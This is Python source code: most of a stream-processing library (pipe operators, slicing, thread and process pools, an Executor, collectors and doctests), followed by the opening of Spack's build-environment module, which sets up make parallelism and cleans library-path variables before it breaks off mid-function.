Stream([1, 3, 5, 7, 9, 11, 13, 15, 17, 19])
"""
def __init__(self, n):
"""n: the number of elements to be taken"""
super(take, self).__init__()
self.n = n
self.items = []
def __call__(self, iterator):
self.items = list(itertools.islice(iterator, self.n))
return iter(self.items)
def __repr__(self):
return 'Stream(%s)' % repr(self.items)
negative = lambda x: x and x < 0  ### guard against None (slice attributes default to None)
class itemtaker(Stream):
"""Slice the input stream, return a list.
>>> i = itertools.count()
>>> i >> item[:10:2]
[0, 2, 4, 6, 8]
>>> i >> item[:5]
[10, 11, 12, 13, 14]
    >>> range(20) >> item[::-2]
[19, 17, 15, 13, 11, 9, 7, 5, 3, 1]
"""
def __init__(self, key=None):
self.key = key
def stop(self):
pass
@staticmethod
def __getitem__(key):
if (type(key) is int) or (type(key) is slice):
return itemtaker(key)
else:
raise TypeError('key must be an integer or a slice')
def __pipe__(self, inpipe):
i = iter(inpipe)
if type(self.key) is int:
## just one item is needed
if self.key >= 0:
# throw away self.key items
collections.deque(itertools.islice(i, self.key), maxlen=0)
return next(i)
else:
# keep the last -self.key items
# since we don't know beforehand when the stream stops
n = -self.key if self.key else 1
items = collections.deque(itertools.islice(i, None), maxlen=n)
if items:
return items[-n]
else:
return []
else:
## a list is needed
if negative(self.key.stop) or negative(self.key.start) \
or not (self.key.start or self.key.stop) \
or (not self.key.start and negative(self.key.step)) \
or (not self.key.stop and not negative(self.key.step)):
# force all evaluation
items = [x for x in i]
else:
# force some evaluation
if negative(self.key.step):
stop = self.key.start
else:
stop = self.key.stop
items = list(itertools.islice(i, stop))
return items[self.key]
def __repr__(self):
return '<itemtaker at %s>' % hex(id(self))
item = itemtaker()
class Sink(Stream):
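    """Consume and discard items from the input stream until stop() is called."""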
def __init__(self):
super(Sink, self).__init__()
self._stop = False
def stop(self):
self._stop = True
def __call__(self, iterator):
for x in iterator:
if not self._stop:
pass
else:
return []
def __pipe__(self, inpipe):
i = iter(inpipe)
for x in i:
if not self._stop:
pass
else:
return []
def __repr__(self):
return '<sink at %s>' % hex(id(self))
class takei(Stream):
"""Take elements of the input stream by indices.
    >>> seq() >> takei(range(2, 43, 4)) >> list
[2, 6, 10, 14, 18, 22, 26, 30, 34, 38, 42]
"""
def __init__(self, indices):
"""indices: an iterable of indices to be taken, should yield
non-negative integers in monotonically increasing order
"""
super(takei, self).__init__()
self.indexiter = iter(indices)
def __call__(self, iterator):
def itaker():
old_idx = -1
idx = next(self.indexiter) # next value to yield
counter = seq()
while 1:
c = next(counter)
elem = next(iterator)
while idx <= old_idx: # ignore bad values
idx = next(self.indexiter)
if c == idx:
yield elem
old_idx = idx
idx = next(self.indexiter)
return itaker()
class drop(Stream):
"""Drop the first n elements of the input stream.
>>> seq(0, 2) >> drop(1) >> take(5)
Stream([2, 4, 6, 8, 10])
"""
def __init__(self, n):
"""n: the number of elements to be dropped"""
super(drop, self).__init__()
self.n = n
def __call__(self, iterator):
collections.deque(itertools.islice(iterator, self.n), maxlen=0)
return iterator
class dropi(Stream):
"""Drop elements of the input stream by indices.
>>> seq() >> dropi(seq(0,3)) >> item[:10]
[1, 2, 4, 5, 7, 8, 10, 11, 13, 14]
"""
def __init__(self, indices):
"""indices: an iterable of indices to be dropped, should yield
non-negative integers in monotonically increasing order
"""
super(dropi, self).__init__()
self.indexiter = iter(indices)
def __call__(self, iterator):
def idropper():
counter = seq()
def try_next_idx():
## so that the stream keeps going
## after the discard iterator is exhausted
try:
return next(self.indexiter), False
except StopIteration:
return -1, True
old_idx = -1
idx, exhausted = try_next_idx() # next value to discard
while 1:
c = next(counter)
elem = next(iterator)
while not exhausted and idx <= old_idx: # ignore bad values
idx, exhausted = try_next_idx()
if c != idx:
yield elem
elif not exhausted:
old_idx = idx
idx, exhausted = try_next_idx()
return idropper()
#_______________________________________________________________________
# Process streams with functions and higher-order ones
class Processor(Stream):
"""A decorator to turn an iterator-processing function into
a Stream processor object.
"""
def __init__(self, function):
"""function: an iterator-processing function, one that takes an
        iterator and returns an iterator
"""
super(Processor, self).__init__()
self.function = function
def __call__(self, iterator):
return self.function(iterator)
class apply(Stream):
"""Invoke a function using each element of the input stream unpacked as
its argument list, a la itertools.starmap.
>>> vectoradd = lambda u,v: zip(u, v) >> apply(lambda x,y: x+y) >> list
>>> vectoradd([1, 2, 3], [4, 5, 6])
[5, 7, 9]
"""
def __init__(self, function):
"""function: to be called with each stream element unpacked as its
argument list
"""
super(apply, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.starmap(self.function, iterator)
class smap(Stream):
"""Invoke a function using each element of the input stream as its only
argument, a la itertools.imap.
>>> square = lambda x: x*x
    >>> range(10) >> smap(square) >> list
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(smap, self).__init__()
self.function = function
def __call__(self, iterator):
return map(self.function, iterator)
class sfilter(Stream):
"""Filter the input stream, selecting only values which evaluates to True
by the given function, a la itertools.ifilter.
>>> even = lambda x: x%2 == 0
    >>> range(10) >> sfilter(even) >> list
[0, 2, 4, 6, 8]
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(sfilter, self).__init__()
self.function = function
def __call__(self, iterator):
return filter(self.function, iterator)
class takewhile(Stream):
"""Take items from the input stream that come before the first item to
evaluate to False by the given function, a la itertools.takewhile.
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(takewhile, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.takewhile(self.function, iterator)
class dropwhile(Stream):
"""Drop items from the input stream that come before the first item to
evaluate to False by the given function, a la itertools.dropwhile.
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(dropwhile, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.dropwhile(self.function, iterator)
class fold(Stream):
"""Combines the elements of the input stream by applying a function of two
    arguments to a value and each element in turn. At each step, the value is
set to the value returned by the function, thus it is, in effect, an
accumulation.
Intermediate values are yielded (similar to Haskell `scanl`).
    This example calculates partial sums of the series 1 + 1/2 + 1/4 + ...
>>> gseq(0.5) >> fold(operator.add) >> item[:5]
[1, 1.5, 1.75, 1.875, 1.9375]
"""
def __init__(self, function, initval=None):
super(fold, self).__init__()
self.function = function
self.initval = initval
def __call__(self, iterator):
def folder():
            if self.initval is not None:
accumulated = self.initval
else:
accumulated = next(iterator)
while 1:
yield accumulated
val = next(iterator)
accumulated = self.function(accumulated, val)
return folder()
#_____________________________________________________________________
# Special purpose stream processors
class chop(Stream):
"""Chop the input stream into segments of length n.
>>> range(10) >> chop(3) >> list
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
"""
def __init__(self, n):
"""n: the length of the segments"""
super(chop, self).__init__()
self.n = n
def __call__(self, iterator):
def chopper():
while 1:
s = iterator >> item[:self.n]
if s:
yield s
else:
break
return chopper()
class itemcutter(smap):
"""Slice each element of the input stream.
    >>> [list(range(10)), list(range(10, 20))] >> cut[::2] >> list
[[0, 2, 4, 6, 8], [10, 12, 14, 16, 18]]
"""
def __init__(self, *args):
super(itemcutter, self).__init__( methodcaller('__getitem__', *args) )
@classmethod
def __getitem__(cls, args):
return cls(args)
def __repr__(self):
return '<itemcutter at %s>' % hex(id(self))
cut = itemcutter()
class flattener(Stream):
"""Flatten a nested stream of arbitrary depth.
    >>> (range(i) for i in seq(step=3)) >> flatten >> item[:18]
[0, 1, 2, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 4, 5, 6, 7, 8]
"""
@staticmethod
def __call__(iterator):
def flatten():
## Maintain a LIFO stack of iterators
stack = []
i = iterator
while True:
try:
e = next(i)
if hasattr(e, "__iter__") and not isinstance(e, basestring):
stack.append(i)
i = iter(e)
else:
yield e
except StopIteration:
try:
i = stack.pop()
except IndexError:
break
return flatten()
def __repr__(self):
return '<flattener at %s>' % hex(id(self))
flatten = flattener()
#_______________________________________________________________________
# Combine multiple streams
class prepend(Stream):
"""Inject values at the beginning of the input stream.
    >>> seq(7, 7) >> prepend(range(0, 10, 2)) >> item[:10]
[0, 2, 4, 6, 8, 7, 14, 21, 28, 35]
"""
def __call__(self, iterator):
return itertools.chain(self.iterator, iterator)
class tee(Stream):
"""Make a T-split of the input stream.
    >>> foo = sfilter(lambda x: x%3==0)
>>> bar = seq(0, 2) >> tee(foo)
>>> bar >> item[:5]
[0, 2, 4, 6, 8]
>>> foo >> item[:5]
[0, 6, 12, 18, 24]
"""
def __init__(self, named_stream):
"""named_stream: a Stream object toward which the split branch
will be piped.
"""
super(tee, self).__init__()
self.named_stream = named_stream
def __pipe__(self, inpipe):
branch1, branch2 = itertools.tee(iter(inpipe))
self.iterator = branch1
Stream.pipe(branch2, self.named_stream)
return self
#_____________________________________________________________________
# _iterqueue and _iterrecv
def _iterqueue(queue):
    # Turn either a threading.Queue or a multiprocessing.queues.SimpleQueue
    # into a thread-safe iterator which will exhaust when StopIteration is
# put into it.
while 1:
item = queue.get()
if item is StopIteration:
# Re-broadcast, in case there is another listener blocking on
# queue.get(). That listener will receive StopIteration and
# re-broadcast to the next one in line.
try:
queue.put(StopIteration)
except IOError:
# Could happen if the Queue is based on a system pipe,
# and the other end was closed.
pass
break
else:
yield item
def _iterrecv(pipe):
    # Turn the receiving end of a multiprocessing.Connection object
# into an iterator which will exhaust when StopIteration is
# put into it. _iterrecv is NOT safe to use by multiple threads.
while 1:
try:
item = pipe.recv()
except EOFError:
break
else:
if item is StopIteration:
break
else:
yield item
#_____________________________________________________________________
# Threaded/forked feeder
class ThreadedFeeder(Iterable):
def __init__(self, generator, *args, **kwargs):
"""Create a feeder that start the given generator with
*args and **kwargs in a separate thread. The feeder will
act as an eagerly evaluating proxy of the generator.
The feeder can then be iter()'ed over by other threads.
This should improve performance when the generator often
blocks in system calls.
"""
self.outqueue = queue.Queue()
def feeder():
i = generator(*args, **kwargs)
while 1:
try:
self.outqueue.put(next(i))
except StopIteration:
self.outqueue.put(StopIteration)
break
self.thread = threading.Thread(target=feeder)
        self.thread.daemon = True
self.thread.start()
def __iter__(self):
return _iterqueue(self.outqueue)
def join(self):
self.thread.join()
def __repr__(self):
return '<ThreadedFeeder at %s>' % hex(id(self))
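# Usage sketch (illustrative only, never called here): wrap a blocking producer
# in a ThreadedFeeder so downstream processing overlaps with its I/O waits.
def _threaded_feeder_example():
    def slow_producer(n):
        for i in range(n):
            time.sleep(0.01)  # stands in for blocking I/O
            yield i
    return ThreadedFeeder(slow_producer, 5) >> smap(lambda x: x * x) >> list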
class ForkedFeeder(Iterable):
def __init__(self, generator, *args, **kwargs):
"""Create a feeder that start the given generator with
*args and **kwargs in a child process. The feeder will
act as an eagerly evaluating proxy of the generator.
The feeder can then be iter()'ed over by other processes.
This should improve performance when the generator often
blocks in system calls. Note that serialization could
be costly.
"""
self.outpipe, inpipe = multiprocessing.Pipe(duplex=False)
def feed():
i = generator(*args, **kwargs)
while 1:
try:
inpipe.send(next(i))
except StopIteration:
inpipe.send(StopIteration)
break
self.process = multiprocessing.Process(target=feed)
self.process.start()
def __iter__(self):
return _iterrecv(self.outpipe)
def join(self):
self.process.join()
def __repr__(self):
return '<ForkedFeeder at %s>' % hex(id(self))
#_____________________________________________________________________
# Asynchronous stream processing using a pool of threads or processes
class ThreadPool(Stream):
"""Work on the input stream asynchronously using a pool of threads.
    >>> range(10) >> ThreadPool(smap(lambda x: x*x)) >> sum
285
The pool object is an iterable over the output values. If an
input value causes an Exception to be raised, the tuple (value,
exception) is put into the pool's `failqueue`. The attribute
    `failure` is a thread-safe iterator over the `failqueue`.
See also: Executor
"""
def __init__(self, function, poolsize=_nCPU, args=[], kwargs={}):
"""function: an iterator-processing function, one that takes an
        iterator and returns an iterator
"""
super(ThreadPool, self).__init__()
        self.function = function
        self.poolsize = poolsize
self.inqueue = queue.Queue()
self.outqueue = queue.Queue()
self.failqueue = queue.Queue()
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
def work():
input, dupinput = itertools.tee(_iterqueue(self.inqueue))
output = self.function(input, *args, **kwargs)
while 1:
try:
self.outqueue.put(next(output))
next(dupinput)
except StopIteration:
break
except Exception as e:
self.failqueue.put((next(dupinput), e))
self.worker_threads = []
for _ in range(poolsize):
t = threading.Thread(target=work)
self.worker_threads.append(t)
t.start()
def cleanup():
# Wait for all workers to finish,
# then signal the end of outqueue and failqueue.
for t in self.worker_threads:
t.join()
self.outqueue.put(StopIteration)
self.failqueue.put(StopIteration)
self.closed = True
self.cleaner_thread = threading.Thread(target=cleanup)
self.cleaner_thread.start()
self.iterator = _iterqueue(self.outqueue)
def __call__(self, inpipe):
if self.closed:
            raise BrokenPipe('All workers are dead, refusing to submit jobs. '
'Use another Pool.')
def feed():
for item in inpipe:
self.inqueue.put(item)
self.inqueue.put(StopIteration)
self.feeder_thread = threading.Thread(target=feed)
self.feeder_thread.start()
return self.iterator
def join(self):
self.cleaner_thread.join()
def __repr__(self):
return '<ThreadPool(poolsize=%s) at %s>' % (self.poolsize, hex(id(self)))
class ProcessPool(Stream):
"""Work on the input stream asynchronously using a pool of processes.
    >>> range(10) >> ProcessPool(smap(lambda x: x*x)) >> sum
285
The pool object is an iterable over the output values. If an
input value causes an Exception to be raised, the tuple (value,
exception) is put into the pool's `failqueue`. The attribute
    `failure` is a thread-safe iterator over the `failqueue`.
See also: Executor
"""
def __init__(self, function, poolsize=_nCPU, args=[], kwargs={}):
"""function: an iterator-processing function, one that takes an
        iterator and returns an iterator
"""
super(ProcessPool, self).__init__()
self.function = function
self.poolsize = poolsize
self.inqueue = multiprocessing.queues.SimpleQueue()
self.outqueue = multiprocessing.queues.SimpleQueue()
self.failqueue = multiprocessing.queues.SimpleQueue()
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
def work():
input, dupinput = itertools.tee(_iterqueue(self.inqueue))
output = self.function(input, *args, **kwargs)
while 1:
try:
self.outqueue.put(next(output))
next(dupinput)
except StopIteration:
break
except Exception as e:
self.failqueue.put((next(dupinput), e))
self.worker_processes = []
for _ in range(self.poolsize):
p = multiprocessing.Process(target=work)
self.worker_processes.append(p)
p.start()
def cleanup():
# Wait for all workers to finish,
# then signal the end of outqueue and failqueue.
for p in self.worker_processes:
p.join()
self.outqueue.put(StopIteration)
self.failqueue.put(StopIteration)
self.closed = True
self.cleaner_thread = threading.Thread(target=cleanup)
self.cleaner_thread.start()
self.iterator = _iterqueue(self.outqueue)
def __call__(self, inpipe):
if self.closed:
            raise BrokenPipe('All workers are dead, refusing to submit jobs. '
'Use another Pool.')
def feed():
for item in inpipe:
self.inqueue.put(item)
self.inqueue.put(StopIteration)
self.feeder_thread = threading.Thread(target=feed)
self.feeder_thread.start()
return self.iterator
def join(self):
self.cleaner_thread.join()
def __repr__(self):
return '<ProcessPool(poolsize=%s) at %s>' % (self.poolsize, hex(id(self)))
class Executor(object):
"""Provide a fine-grained level of control over a ThreadPool or ProcessPool.
The constructor takes a pool class and arguments to its constructor::
    >>> executor = Executor(ThreadPool, smap(lambda x: x*x))
Job ids are returned when items are submitted::
>>> executor.submit(*range(10))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> executor.submit('foo')
10
    A call to close() ends job submission. Worker threads/processes
are now allowed to terminate after all jobs are completed::
>>> executor.close()
The `result` and `failure` attributes are Stream instances and
    thus iterable. The returned iterators behave as follows: their
next() calls will block until a next output is available, or
raise StopIteration if there is no more output. Thus we could use
the attributes `result` and `failure` like any other iterables::
>>> set(executor.result) == set([0, 1, 4, 9, 16, 25, 36, 49, 64, 81])
True
>>> list(executor.failure)
[('foo', TypeError("can't multiply sequence by non-int of type 'str'",))]
"""
def __init__(self, poolclass, function, poolsize=_nCPU, args=[], kwargs={}):
def process_job_id(input):
input, dupinput = itertools.tee(input)
id = iter(dupinput >> cut[0])
input = iter(input >> cut[1])
output = function(input, *args, **kwargs)
for item in output:
yield next(id), item
self.pool = poolclass(process_job_id,
poolsize=poolsize,
args=args,
kwargs=kwargs)
self.jobcount = 0
self._status = []
self.waitqueue = queue.Queue()
if poolclass is ProcessPool:
self.resultqueue = multiprocessing.queues.SimpleQueue()
self.failqueue = multiprocessing.queues.SimpleQueue()
else:
self.resultqueue = queue.Queue()
self.failqueue = queue.Queue()
self.result = Stream(_iterqueue(self.resultqueue))
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
self.lock = threading.Lock()
## Acquired to submit and update job statuses.
self.sema = threading.BoundedSemaphore(poolsize)
## Used to throttle transfer from waitqueue to pool.inqueue,
## acquired by input_feeder, released by trackers.
def feed_input():
for id, item in _iterqueue(self.waitqueue):
self.sema.acquire()
with self.lock:
if self._status[id] == 'SUBMITTED':
self.pool.inqueue.put((id, item))
self._status[id] = 'RUNNING'
else:
self.sema.release()
self.pool.inqueue.put(StopIteration)
self.inputfeeder_thread = threading.Thread(target=feed_input)
self.inputfeeder_thread.start()
def track_result():
for id, item in self.pool:
self.sema.release()
with self.lock:
self._status[id] = 'COMPLETED'
self.resultqueue.put(item)
self.resultqueue.put(StopIteration)
self.resulttracker_thread = threading.Thread(target=track_result)
self.resulttracker_thread.start()
def track_failure():
for outval, exception in self.pool.failure:
self.sema.release()
id, item = outval
with self.lock:
self._status[id] = 'FAILED'
self.failqueue.put((item, exception))
self.failqueue.put(StopIteration)
self.failuretracker_thread = threading.Thread(target=track_failure)
self.failuretracker_thread.start()
def submit(self, *items):
"""Return job ids assigned to the submitted items."""
with self.lock:
if self.closed:
raise BrokenPipe('Job submission has been closed.')
id = self.jobcount
self._status += ['SUBMITTED'] * len(items)
self.jobcount += len(items)
for item in items:
self.waitqueue.put((id, item))
id += 1
if len(items) == 1:
return id - 1
else:
                return list(range(id - len(items), id))
def cancel(self, *ids):
"""Try to cancel jobs with associated ids.
Return the actual number of jobs cancelled.
"""
ncancelled = 0
with self.lock:
for id in ids:
try:
if self._status[id] == 'SUBMITTED':
self._status[id] = 'CANCELLED'
ncancelled += 1
except IndexError:
pass
return ncancelled
def status(self, *ids):
"""Return the statuses of jobs with associated ids at the
        time of call: either 'SUBMITTED', 'CANCELLED', 'RUNNING',
'COMPLETED' or 'FAILED'.
"""
with self.lock:
if len(ids) > 1:
return [self._status[i] for i in ids]
else:
return self._status[ids[0]]
def close(self):
"""Signal that the executor will no longer accept job submission.
Worker threads/processes are now allowed to terminate after all
        jobs have been completed. Without a call to close(), they will
stay around forever waiting for more jobs to come.
"""
with self.lock:
if self.closed:
return
self.waitqueue.put(StopIteration)
self.closed = True
def join(self):
"""Note that the Executor must be close()'d elsewhere,
or join() will never return.
"""
self.inputfeeder_thread.join()
self.pool.join()
self.resulttracker_thread.join()
self.failuretracker_thread.join()
def shutdown(self):
"""Shut down the Executor. Suspend all waiting jobs.
Running workers will terminate after finishing their current job items.
The call will block until all workers are terminated.
"""
with self.lock:
self.pool.inqueue.put(StopIteration) # Stop the pool workers
self.waitqueue.put(StopIteration) # Stop the input_feeder
_iterqueue(self.waitqueue) >> item[-1] # Exhaust the waitqueue
self.closed = True
self.join()
def __repr__(self):
return '<Executor(%s, poolsize=%s) at %s>' % (self.pool.__class__.__name__,
self.pool.poolsize,
hex(id(self)))
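# Illustrative sketch (never called here): cancel() only affects jobs that are
# still 'SUBMITTED'; status() reports where each job ended up.
def _executor_cancel_example():
    ex = Executor(ThreadPool, smap(lambda x: x * x))
    ids = ex.submit(*range(100))
    ncancelled = ex.cancel(*ids[50:])  # best effort; some may already be running
    ex.close()
    results = set(ex.result)
    return ncancelled, ex.status(ids[0]), results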
#_____________________________________________________________________
# Collectors and Sorters
class PCollector(Stream):
"""Collect items from many ForkedFeeder's or ProcessPool's.
"""
def __init__(self):
self.inpipes = []
def selrecv():
while self.inpipes:
ready, _, _ = select.select(self.inpipes, [], [])
for inpipe in ready:
item = inpipe.recv()
if item is StopIteration:
del self.inpipes[self.inpipes.index(inpipe)]
else:
yield item
self.iterator = selrecv()
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<PCollector at %s>' % hex(id(self))
class _PCollector(Stream):
"""Collect items from many ForkedFeeder's or ProcessPool's.
All input pipes are polled individually. When none is ready, the
    collector sleeps for a fixed duration before polling again.
"""
def __init__(self, waittime=0.1):
"""waitime: the duration that the collector sleeps for
when all input pipes are empty
"""
self.inpipes = []
self.waittime = waittime
def pollrecv():
while self.inpipes:
                ready = [p for p in self.inpipes if p.poll()]
                if not ready:
                    time.sleep(self.waittime)
for inpipe in ready:
item = inpipe.recv()
if item is StopIteration:
del self.inpipes[self.inpipes.index(inpipe)]
else:
yield item
self.iterator = pollrecv()
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
        return '<PCollector at %s>' % hex(id(self))
if sys.platform == "win32":
PCollector = _PCollector
class QCollector(Stream):
"""Collect items from many ThreadedFeeder's or ThreadPool's.
All input queues are polled individually. When none is ready, the
    collector sleeps for a fixed duration before polling again.
"""
def __init__(self, waittime=0.1):
"""waitime: the duration that the collector sleeps for
when all input pipes are empty
"""
self.inqueues = []
self.waittime = waittime
def nonemptyget():
while self.inqueues:
ready = [q for q in self.inqueues if not q.empty()]
if not ready:
time.sleep(self.waittime)
for q in ready:
item = q.get()
if item is StopIteration:
del self.inqueues[self.inqueues.index(q)]
else:
yield item
self.iterator = nonemptyget()
def __pipe__(self, inpipe):
self.inqueues.append(inpipe.outqueue)
def __repr__(self):
return '<QCollector at %s>' % hex(id(self))
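# Fan-in sketch (illustrative only, never called here): pipe several
# ThreadedFeeder's into one QCollector and drain the merged stream.
def _qcollector_example():
    collector = QCollector()
    ThreadedFeeder(iter, [1, 2, 3]) >> collector
    ThreadedFeeder(iter, [4, 5, 6]) >> collector
    return sorted(collector >> item[:6])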
class PSorter(Stream):
"""Merge sorted input (smallest to largest) coming from many
ForkedFeeder's or ProcessPool's.
"""
def __init__(self):
self.inpipes = []
def __iter__(self):
        return heapq.merge(*[_iterrecv(p) for p in self.inpipes])
def __pipe__(self, inpipe):
self.inpipes.append(inpipe.outpipe)
def __repr__(self):
return '<PSorter at %s>' % hex(id(self))
class QSorter(Stream):
"""Merge sorted input (smallest to largest) coming from many
    ThreadedFeeder's or ThreadPool's.
"""
def __init__(self):
self.inqueues = []
def __iter__(self):
        return heapq.merge(*map(_iterqueue, self.inqueues))
def __pipe__(self, inpipe):
self.inqueues.append(inpipe.outqueue)
def __repr__(self):
        return '<QSorter at %s>' % hex(id(self))
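# Illustrative sketch (not part of the library): the k-way merge that PSorter
# and QSorter delegate to heapq.merge. Every input must already be sorted;
# merge then yields one sorted stream lazily, without loading everything at once.
def _example_sorted_merge():
    import heapq
    return list(heapq.merge(iter([1, 4, 9]), iter([2, 3, 10])))  # -> [1, 2, 3, 4, 9, 10]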
#_____________________________________________________________________
# Useful generator functions
def seq(start=0, step=1):
"""An arithmetic sequence generator. Works with any type with + defined.
>>> seq(1, 0.25) >> item[:10]
[1, 1.25, 1.5, 1.75, 2.0, 2.25, 2.5, 2.75, 3.0, 3.25]
"""
def seq(a, d):
while 1:
yield a
a += d
return seq(start, step)
def gseq(ratio, initval=1):
"""A geometric sequence generator. Works with any type with * defined.
>>> from decimal import Decimal
>>> gseq(Decimal('.2')) >> item[:4]
[1, Decimal('0.2'), Decimal('0.04'), Decimal('0.008')]
"""
while 1:
yield initval
initval *= ratio
def repeatcall(func, *args):
"""Repeatedly call func(*args) and yield the result.
Useful when func(*args) returns different results, esp. randomly.
"""
return itertools.starmap(func, itertools.repeat(args))
def chaincall(func, initval):
"""Yield func(initval), func(func(initval)), etc.
>>> chaincall(lambda x: 3*x, 2) >> take(10)
Stream([2, 6, 18, 54, 162, 486, 1458, 4374, 13122, 39366])
"""
x = initval
while 1:
yield x
x = func(x)
#_____________________________________________________________________
# Useful curried versions of builtins.{max, min, reduce}
def maximum(key):
"""
Curried version of the built-in max.
>>> Stream([3, 5, 28, 42, 7]) >> maximum(lambda x: x%28)
42
"""
return lambda s: max(s, key=key)
def minimum(key):
"""
Curried version of the built-in min.
>>> Stream([[13, 52], [28, 35], [42, 6]]) >> minimum(lambda v: v[0] + v[1])
[42, 6]
"""
return lambda s: min(s, key=key)
def reduce(function, initval=None):
"""
Curried version of the built-in reduce.
>>> reduce(lambda x,y: x+y)( [1, 2, 3, 4, 5] )
15
"""
if initval is None:
return lambda s: builtins.reduce(function, s)
else:
return lambda s: builtins.reduce(function, s, initval)
#_____________________________________________________________________
# main
if __name__ == "__main__":
import doctest
if doctest.testmod()[0]:
import sys
sys.exit(1)
|
build_environment.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
   the package's module scope. This allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import iteritems
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.store
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
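# Illustrative sketch (not Spack package code): how a package might call the
# MakeExecutable described above, assuming SPACK_NO_PARALLEL_MAKE is unset.
# The target names and job count are hypothetical; 'parallel' and 'jobs_env'
# are consumed here, everything else passes through to Executable.__call__.
def _example_make_usage():
    make = MakeExecutable('make', jobs=8)
    make()                               # runs `make -j8`
    make('install', parallel=False)      # runs `make install` with no -j flag
    make('check', jobs_env='TEST_JOBS')  # runs `make -j8 check`, exporting TEST_JOBS=8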
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
# Set compiler variables used by CMake and autotools
